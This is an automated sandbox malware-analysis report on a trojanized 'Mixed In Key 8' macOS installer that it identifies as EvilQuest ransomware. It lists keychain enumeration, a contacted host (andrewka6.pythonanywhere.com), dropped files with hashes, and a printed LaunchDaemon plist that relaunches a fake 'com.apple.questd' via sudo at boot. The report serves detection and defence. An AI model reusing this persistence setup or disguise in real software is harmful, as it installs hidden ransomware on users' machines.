              Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 732)Sysctl requested: kern.osrelease (1.2)Jump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.ostype (1.1)
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.osrelease (1.2)
              Source: /usr/bin/osascript (PID: 839)Sysctl requested: kern.ostype (1.1)
              Source: /usr/bin/osascript (PID: 839)Sysctl requested: kern.osrelease (1.2)
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Sysctl requested: kern.ostype (1.1)
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Sysctl requested: kern.osrelease (1.2)
              Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 732)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /tmp/PKInstallSandbox.rmbAho/Scripts/com.mixedinkey.installer.YPgB1A/postinstall (PID: 751)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 763)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 764)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 769)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 770)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 773)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 774)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 777)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 778)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 797)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 798)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 801)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 802)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 806)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 808)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 822)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 823)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 835)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 836)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 839)Sysctl requested: kern.hostname (1.10)
              Source: /usr/bin/osascript (PID: 839)Sysctl requested: kern.hostname (1.10)
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 781)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 782)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 785)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 786)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 789)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 790)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 793)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 794)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 805)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 807)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 813)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 814)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 831)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 832)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 851)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 852)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 855)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 856)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 859)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 860)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 863)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 864)Sysctl requested: kern.hostname (1.10)
              Source: /bin/sh (PID: 867)Sysctl requested: kern.hostname (1.10)
              Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 732)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
              Source: /usr/bin/osascript (PID: 839)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

              Stealing of Sensitive Information:

              barindex
              Might steal keychain information which contains credentialsShow sources
              Source: /Library/mixednkey/toolroomd (PID: 756)Keychain directory enumerated: /Users/ben/Library/Keychains
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Keychain directory enumerated: /Users/ben/Library/Keychains

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting1Launch Daemon3Sudo1Disabling Security Tools1Credential Dumping1System Information Discovery61Remote File Copy3Data from Local System1Data Encrypted11Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Replication Through Removable MediaUser Execution1LC_LOAD_DYLIB Addition1Launch Daemon3Scripting1Keychain1Process Discovery1AppleScript3Input Capture1Exfiltration Over Other Network MediumStandard Cryptographic Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              External Remote ServicesCommand-Line Interface1Hidden Files and Directories11Elevated Execution with Prompt2File Deletion2Input Capture1Virtualization/Sandbox Evasion1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationRemote Access Tools1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Drive-by CompromiseAppleScript3Launch Agent4Plist Modification1Masquerading11Credentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
              Exploit Public-Facing ApplicationCommand-Line InterfacePlist Modification1File System Permissions WeaknessHidden Files and Directories11Account ManipulationRemote System DiscoveryShared WebrootData StagedScheduled TransferStandard Application Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion1Brute ForceSystem Owner/User DiscoveryThird-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
              Spearphishing AttachmentScriptingPath InterceptionScheduled TaskCode Signing11Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionPlist Modification1Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Shell
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 106234 Sample: Nt7gLoFlYn Startdate: 01/07/2020 Architecture: MAC Score: 100 130 andrewka6.pythonanywhere.com 35.173.69.207, 49287, 49288, 49289 AMAZON-AESUS United States 2->130 132 23.210.249.175, 443, 49185, 49186 AKAMAI-ASUS United States 2->132 134 4 other IPs or domains 2->134 146 Yara detected EvilQuest Ransomware 2->146 148 Contains symbols with suspicious names likely related to privilege escalation 2->148 150 Contains symbols with suspicious names likely related to anti-analysis 2->150 152 2 other signatures 2->152 11 xpcproxy sudo 2->11         started        14 xpcproxy installd 629 2->14         started        17 xpcproxy Installer 2->17         started        19 xpcproxy iBooksCacheDelete 2->19         started        signatures3 process4 file5 164 Executes the "sudo" command used to execute a command as another user 11->164 21 sudo com.apple.questd 11->21         started        122 /private/var/folde.../Utils/.BC.T_qXDTh4, Mach-O 14->122 dropped 124 /private/var/folde.../Utils/.BC.T_5f8PkX, Mach-O 14->124 dropped 126 /private/var/folde...cripts/.BC.T_PhXClD, POSIX 14->126 dropped 128 5 other files (none is malicious) 14->128 dropped 25 postinstall 14->25         started        27 shove 14->27         started        29 install_monitor 1 14->29         started        31 efw_cache_update 14->31         started        signatures6 process7 file8 106 /private/var/root/....apple.questd.plist, XML 21->106 dropped 108 /private/var/root/...st/com.apple.questd, Mach-O 21->108 dropped 110 /private/var/root/Library/.FNm8T2eKL, Mach-O 21->110 dropped 112 15 other files (2 malicious) 21->112 dropped 154 Detected macOS EvilQuest ransomware 21->154 156 Creates hidden Mach-O files 21->156 158 Might steal keychain information which contains credentials 21->158 160 5 other signatures 21->160 33 sh osascript 21->33         started        36 sh osascript 21->36         started        38 sh osascript 21->38         started        47 9 other processes 21->47 40 sh toolroomd 13 25->40         started        43 sh mkdir 25->43         started        45 sh mv 25->45         started        49 2 other processes 25->49 signatures9 process10 file11 136 Executes shell scripts with administrative rights 33->136 51 osascript security_authtrampoline uid uid sh 33->51         started        53 osascript security_authtrampoline uid uid sh 36->53         started        55 osascript security_authtrampoline uid uid sh 38->55         started        114 /Users/ben/Library....apple.questd.plist, XML 40->114 dropped 116 /Users/ben/Desktop/Nt7gLoFlYn.dmg, data 40->116 dropped 118 /Library/LaunchDae....apple.questd.plist, XML 40->118 dropped 120 /Library/AppQuest/com.apple.questd, Mach-O 40->120 dropped 138 Detected macOS EvilQuest ransomware 40->138 140 Creates hidden Mach-O files 40->140 142 Might steal keychain information which contains credentials 40->142 144 6 other signatures 40->144 57 sh osascript 40->57         started        60 sh osascript 40->60         started        62 sh osascript 40->62         started        66 7 other processes 40->66 64 osascript security_authtrampoline uid uid sh 47->64         started        68 8 other processes 47->68 signatures12 process13 signatures14 76 2 other processes 51->76 78 2 other processes 53->78 80 2 other processes 55->80 162 Executes shell scripts with administrative rights 57->162 70 osascript security_authtrampoline uid uid sh 57->70         started        72 osascript security_authtrampoline uid uid sh 60->72         started        74 osascript security_authtrampoline uid uid sh 62->74         started        82 2 other processes 64->82 84 6 other processes 66->84 86 14 other processes 68->86 process15 process16 88 sh launchctl 70->88         started        90 sh launchctl 70->90         started        92 sh launchctl 72->92         started        94 sh launchctl 72->94         started        96 sh launchctl 74->96         started        98 sh launchctl 74->98         started        100 sh launchctl 84->100         started        102 sh launchctl 84->102         started        104 10 other processes 84->104

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              cam-macmac-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              andrewka6.pythonanywhere.com
              35.173.69.207
              truefalse
                high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://andrewka6.pythonanywhere.com/ret.txtfalse
                  high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0.BC.T_0gaPmY.311.dr, .BC.T_1AZHwU.311.dr, .BC.T_6q2u9T.311.dr, .BC.T_8YnpXO.311.dr, .BC.T_a5ogjE.311.drfalse
                    high
                    http://www.platinumnotes.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mikMixed In Key 8false
                      unknown
                      http://www.apache.org/licenses/.BC.T_6q2u9T.311.drfalse
                        high
                        https://www.mixedinkey.comInfo.plistfalse
                          high
                          https://news.mixedinkey.com/api/news/unreadcount?channels=%.BC.T_7YfcYl.311.drfalse
                            high
                            https://online5.mixedinkey.com/Services/UserFeedback/FeedbackInfo.plistfalse
                              high
                              https://mixedinkey.com/tutorials/mixed-in-key/harmonicMixing101.htmlMixed In Key 8false
                                high
                                https://www.mixedinkey.com/BuyMacOSX.aspx?S=AppInfo.plistfalse
                                  high
                                  http://odesi.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mikMixed In Key 8false
                                    high
                                    https://online5.mixedinkey.com/Services/Analysis/AnalyzeSongMixed In Key 8false
                                      high
                                      http://www.daemonology.net/bsdiff/.BC.T_3Hh3Nv.311.drfalse
                                        unknown
                                        https://news.mixedinkey.com/news?theme=MIK&channels=%.BC.T_7YfcYl.311.drfalse
                                          high
                                          http://www.apache.org/licenses/LICENSE-2.0Copyright.BC.T_0gaPmY.311.dr, .BC.T_1AZHwU.311.dr, .BC.T_8YnpXO.311.dr, .BC.T_a5ogjE.311.drfalse
                                            high
                                            http://www.apache.org/licenses/LICENSE-2.0RobotoBlack.BC.T_0gaPmY.311.dr, .BC.T_8YnpXO.311.drfalse
                                              high
                                              https://mixedinkey.com/tutorials/mixed-in-key/seratoIntegration.htmlMixed In Key 8false
                                                high
                                                https://news.mixedinkey.com/api/news/channels/searchbyvipcode?vipCode=%.BC.T_7YfcYl.311.drfalse
                                                  high
                                                  https://community.mixedinkey.com.BC.T_b1MPG3.311.drfalse
                                                    high
                                                    http://www.mixedinkey.com/Book/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mikMixed In Key 8false
                                                      high
                                                      http://developer.kde.org/~wheeler/taglib/api/.BC.T_3B76ri.311.drfalse
                                                        high
                                                        http://www.apache.org/licenses/LICENSE-2.0RobotoMedium.BC.T_1AZHwU.311.drfalse
                                                          high
                                                          https://mikteam.atlassian.net/wiki/display/MT/How.BC.T_3B76ri.311.drfalse
                                                            high
                                                            https://www.MixedInKey.com/PrivacyPolicy.BC.T_b1MPG3.311.drfalse
                                                              high
                                                              https://mixedinkey.com/master-collection/.BC.T_b1MPG3.311.drfalse
                                                                high
                                                                http://www.platinumnotes.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik8_macMixed In Key 8false
                                                                  unknown
                                                                  https://community.mixedinkey.com/BlogPosts/Categories/News/.BC.T_b1MPG3.311.drfalse
                                                                    high
                                                                    https://mixedinkey.com/tutorials/mixed-in-key/abletonIntegration.htmlhttps://mixedinkey.com/tutorialMixed In Key 8false
                                                                      high
                                                                      https://online5.mixedinkey.com/Services/License/CheckLicenseMixed In Key 8false
                                                                        high
                                                                        https://mixedinkey.com/tutorials/mixed-in-key/abletonIntegration.htmlMixed In Key 8false
                                                                          high
                                                                          https://mixedinkey.com/tutorials/mixed-in-key/traktorIntegration.htmlMixed In Key 8false
                                                                            high
                                                                            http://flow8deck.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mikMixed In Key 8false
                                                                              unknown
                                                                              https://www.mixedinkey.com/DownloadMacOSX.aspx?Version=Original&VIP=%Info.plistfalse
                                                                                high
                                                                                https://mixedinkey.com/tutorials/mixed-in-key/startHere.htmlMixed In Key 8false
                                                                                  high
                                                                                  https://mixedinkey.com/tutorials/mixed-in-key/iTunesIntegration.htmlMixed In Key 8false
                                                                                    high
                                                                                    https://mixedinkey.com/tutorials/mixed-in-key/pioneerIntegration.htmlMixed In Key 8false
                                                                                      high
                                                                                      https://www.MixedInKey.com/downloads.aspx.BC.T_b1MPG3.311.drfalse
                                                                                        high
                                                                                        https://www.mixedinkey.com/PrivacyPolicyMixed In Key 8false
                                                                                          high
                                                                                          http://www.mixedinkey.com/.BC.T_7YfcYl.311.drfalse
                                                                                            high
                                                                                            https://www.mixedinkey.com/recoveryInfo.plistfalse
                                                                                              high
                                                                                              http://mashup.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mikMixed In Key 8false
                                                                                                high
                                                                                                http://odesi.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mikhttp://www.platinumnMixed In Key 8false
                                                                                                  high
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0RobotoLight.BC.T_a5ogjE.311.drfalse
                                                                                                    high

                                                                                                    Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public

                                                                                                    IPCountryFlagASNASN NameMalicious
                                                                                                    72.247.178.67
                                                                                                    United States
                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                    23.210.249.175
                                                                                                    United States
                                                                                                    16625AKAMAI-ASUSfalse
                                                                                                    72.247.179.32
                                                                                                    United States
                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                    104.103.72.192
                                                                                                    United States
                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                    35.173.69.207
                                                                                                    United States
                                                                                                    14618AMAZON-AESUSfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox Version:
                                                                                                    Analysis ID:106234
                                                                                                    Start date:01.07.2020
                                                                                                    Start time:14:18:01
                                                                                                    Joe Sandbox Product:Cloud
                                                                                                    Overall analysis duration:0h 20m 31s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Sample file name:Nt7gLoFlYn (renamed file extension from none to dmg)
                                                                                                    Cookbook file name:defaultmacfilecookbook.jbs
                                                                                                    Analysis system description:Mac Mini, Mojave (Java JDK 11.0.4, Adobe Reader 2019.012.20034, Flash 32.0.0.223)
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.rans.spyw.expl.evad.macDMG@0/1306@2/0
                                                                                                    Warnings:
                                                                                                    Show All
                                                                                                    • Excluded IPs from analysis (whitelisted): 17.253.73.202, 17.253.73.207, 104.108.47.247, 104.108.64.38, 17.253.57.201, 17.253.57.206, 104.108.43.200, 17.167.192.231, 17.167.194.224, 17.167.192.225, 17.167.194.230, 17.253.109.204
                                                                                                    • Excluded domains from analysis (whitelisted): www.apple.com.edgekey.net.globalredir.akadns.net, gsp64-ssl.ls.apple.com, e6858.dsce9.akamaiedge.net, e673.dsce9.akamaiedge.net, gsp64-ssl.ls-apple.com.akadns.net, gspe35-ssl.ls-apple.com.akadns.net, gsp-ssl.ls-apple.com.akadns.net, www.apple.com, ocsp-lb.apple.com.akadns.net, mesu-cdn.origin-apple.com.akadns.net, ocsp.apple.com, gspe35-ssl.ls.apple.com.edgekey.net, mesu.g.aaplimg.com, gspx-ssl.ls.apple.com, e6987.e9.akamaiedge.net, www.apple.com.edgekey.net, configuration.apple.com.akadns.net, gsp-ssl.ls.apple.com, configuration.apple.com.edgekey.net, gsp-ssl-geomap.ls-apple.com.akadns.net, world-gen.g.aaplimg.com
                                                                                                    • Report creation exceeded maximum number of non-whitelisted processes and may have missing process information.
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Too many dropped files, some of them have not been restored


                                                                                                    Runtime Messages

                                                                                                    Command:open "/Volumes/Mixed In Key 8/Mixed In Key 8.pkg" --args
                                                                                                    Exit Code:0
                                                                                                    Exit Code Info:
                                                                                                    Killed:False
                                                                                                    Standard Output:

                                                                                                    Standard Error:

                                                                                                    Created / dropped Files

                                                                                                    /Library/AppQuest/com.apple.questd
                                                                                                    Process:/Library/mixednkey/toolroomd
                                                                                                    File Type:Mach-O 64-bit executable
                                                                                                    Size (bytes):87920
                                                                                                    Entropy (8bit):5.9040129231424165
                                                                                                    Encrypted:false
                                                                                                    MD5:322F4FB8F257A2E651B128C41DF92B1D
                                                                                                    SHA1:EFBB681A61967E6F5A811F8649EC26EFE16F50AE
                                                                                                    SHA-256:5A024FFABEFA6082031DCCDB1E74A7FEC9F60F257CD0B1AB0F698BA2A5BACA6B
                                                                                                    SHA-512:33C8CF815E4B37A3481C0BA4DFB14A4735A46575F6F70D5B351A8595E4EC8886224577C89C80D726F2E3D7CF2460D0CDD983379ACB5FDA0A9B7310F86C988E53
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /Library/AppQuest/com.apple.questd, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /Library/AppQuest/com.apple.questd, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Preview: .......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........
                                                                                                    /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    Process:/Library/mixednkey/toolroomd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):435
                                                                                                    Entropy (8bit):5.128522920876032
                                                                                                    Encrypted:false
                                                                                                    MD5:A3D34532A7DD2CD1D73CEA75DEB0677F
                                                                                                    SHA1:3019D1C50907FB2597121C03619990C5670FF6F4
                                                                                                    SHA-256:779A31E4DE99F9DE28DE8BF064C504382E050C114E2E865CC1F694C7E6339735
                                                                                                    SHA-512:52618A5F14247C909A3857B122A124D0DDD00890C128CF041976182423B3D728CAB11DAF5B6A1ADB6845D062B54083E72380184B6F76369482305C2782BEDD91
                                                                                                    Malicious:true
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>.<key>Label</key>.<string>questd</string>..<key>ProgramArguments</key>.<array>.<string>sudo</string>.<string>/Library/AppQuest/com.apple.questd</string>.<string>--silent</string>.</array>..<key>RunAtLoad</key>.<true/>..<key>KeepAlive</key>.<true/>..</dict>.</plist>
                                                                                                    /Library/Receipts/InstallHistory.plist
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):15309
                                                                                                    Entropy (8bit):4.931215029424514
                                                                                                    Encrypted:false
                                                                                                    MD5:EEDCD1CEE6E58CFC466EEBF373D8278E
                                                                                                    SHA1:0FAA32C90F57C3756FB38CFEC511710AB640B9D9
                                                                                                    SHA-256:046795DABD7F2A27B31554A28B5322503155A5BAB7DBF340ED65C6BD0E7847A0
                                                                                                    SHA-512:0B1841AD1233753019AFDDC8DA1591B83A1FF42958AAD54942120F4944C23544A8DBB1FE31D61E269EF2563E4B62F48FF55C4E3D34FACE7E126913F918C1FF8D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<array>..<dict>...<key>date</key>...<date>2017-05-31T10:51:33Z</date>...<key>displayName</key>...<string>OS X</string>...<key>displayVersion</key>...<string></string>...<key>packageIdentifiers</key>...<array>....<string>com.apple.pkg.BaseSystemResources</string>....<string>com.apple.pkg.Essentials</string>....<string>com.apple.pkg.OSInstall</string>....<string>com.apple.pkg.X11redirect</string>...</array>...<key>processName</key>...<string>OS X Installer</string>..</dict>..<dict>...<key>contentType</key>...<string>config-data</string>...<key>date</key>...<date>2017-05-31T14:18:37Z</date>...<key>displayName</key>...<string>Chinese Word List Update</string>...<key>displayVersion</key>...<string>4.22</string>...<key>packageIdentifiers</key>...<array>....<string>com.apple.pkg.ChineseWordlistUpdate.14U1240</string>...</array>...<
                                                                                                    /Users/ben/..CFUserTextEncoding.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):314
                                                                                                    Entropy (8bit):4.393251656258503
                                                                                                    Encrypted:false
                                                                                                    MD5:8471377714CF2DFA4E320FAC707E2961
                                                                                                    SHA1:4A887697CC7F141C7228B52597F246D716773DDB
                                                                                                    SHA-256:3CED2981288B68EDE8446CF5388B69DDD97F5EC80B73A00CAB20EE3A978F6F00
                                                                                                    SHA-512:4BF8133E5955FB03C79622A5705C6099140E279FEDD67C28EDD21479F2F42EDC095539AF5DDF3695142A6B97071421946ECAA8A8AB9EBE81FC821F3F9DCECE15
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: b... .....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/.bash_sessions/.EBE6D3A3-8F8E-4F5E-A314-627FCC8C6C15.history.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):346
                                                                                                    Entropy (8bit):4.812389621875755
                                                                                                    Encrypted:false
                                                                                                    MD5:6C2380216C32E20FF071F04BCECEBAD3
                                                                                                    SHA1:2CCF819B6F087179AF91ECBD8AC9AD0402D0CB2A
                                                                                                    SHA-256:5E1343878DF9585E2D4C1DD03450DAC84B7398949C1E598E1E887BC103DB760E
                                                                                                    SHA-512:01021CE92F04A5CA710EDB62FE84A86CF182D5029C917A807E2A10F6578BB533F164667365D6A11DED28EEAE9D36D0085FEF8D3CBEE3CC7174F9C5B81B969499
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: `0.?.+,.!.n.{........8^...q......]H.C._G.)................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/.bash_sessions/.EBE6D3A3-8F8E-4F5E-A314-627FCC8C6C15.historynew.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/.ncspot
                                                                                                    Process:/Library/mixednkey/toolroomd
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Size (bytes):43
                                                                                                    Entropy (8bit):4.5653449870589835
                                                                                                    Encrypted:false
                                                                                                    MD5:BE34CB2BB282BBA307EC8E411D9BECC3
                                                                                                    SHA1:320BC5461062813739AECCF9180E17F8F405BF57
                                                                                                    SHA-256:0A2C6D2EC7E200C13D72A014F5DEE74C58A8818EE85DCF38BF030D1515C2344A
                                                                                                    SHA-512:B4E6BADBC6B84AB61FB35721CC61FD6CF65A8212C66C85077CC2FD04EDB0C7C495DA22670DDD73F321A945A75F27D98CDE7F5189185E3AF5E7B55FED2A44B63F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 1WtHtf0fWcbg1nK8vF2yRSsy3zEFYP1Nz|3x0000043
                                                                                                    /Users/ben/Desktop/.Nt7gLoFlYn.dmg.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10886594
                                                                                                    Entropy (8bit):7.999974581141856
                                                                                                    Encrypted:true
                                                                                                    MD5:57CAA9B59A715A3504BB6D38142E953C
                                                                                                    SHA1:C2A60E74AB4163FB7E90F7816586F7C530235A08
                                                                                                    SHA-256:5BD416D22A461C9A0C3FBD6EE29D3ABCD08CF8FA556964D90979A2B1A57E2F0B
                                                                                                    SHA-512:C6D053253AE9F27BA57D3851E92169C8E4AD363EA532836771F93BC953130D6F4F471FEC5B25840F582F24CDB1DD6C0779AADD124FF4B5358ADF7C07379DA6FE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
